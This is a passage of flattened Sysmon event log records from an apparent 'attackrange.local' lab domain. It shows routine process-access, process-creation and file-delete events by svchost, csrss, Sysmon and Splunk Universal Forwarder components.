12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439673Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439672Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439671Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.870{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439670Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.870{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439669Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.870{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-01DA-6088-AD28-00000000BA01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439668Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.870{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DA-6088-AD28-00000000BA01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439667Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.870{42DC5269-01DA-6088-AD28-00000000BA01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000439666Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.367{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC839608E8DBF97E3C2C86C710AAD35D,SHA256=3068834A9883C57FBF4589E45CD24393D39C68C61282810578B20C949B0F6CB0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439665Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.345{42DC5269-01DA-6088-AC28-00000000BA01}30685640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439664Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.207{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DA-6088-AC28-00000000BA01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439663Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439662Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439661Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439660Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.206{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439659Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439658Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439657Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439656Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439655Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439654Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-01DA-6088-AC28-00000000BA01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439653Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.205{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DA-6088-AC28-00000000BA01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439652Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.204{42DC5269-01DA-6088-AC28-00000000BA01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000439651Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.056{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439650Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.056{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291097Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:47.584{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F9353E0A4D2DD549C97922D1B46CDF6,SHA256=3CFE2933668F962CAEB7231D1E0BEFCD05C7657B32546CBCF8639ED993022E2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439697Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.553{42DC5269-01DB-6088-AE28-00000000BA01}33966960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439696Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.415{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DB-6088-AE28-00000000BA01}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439695Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 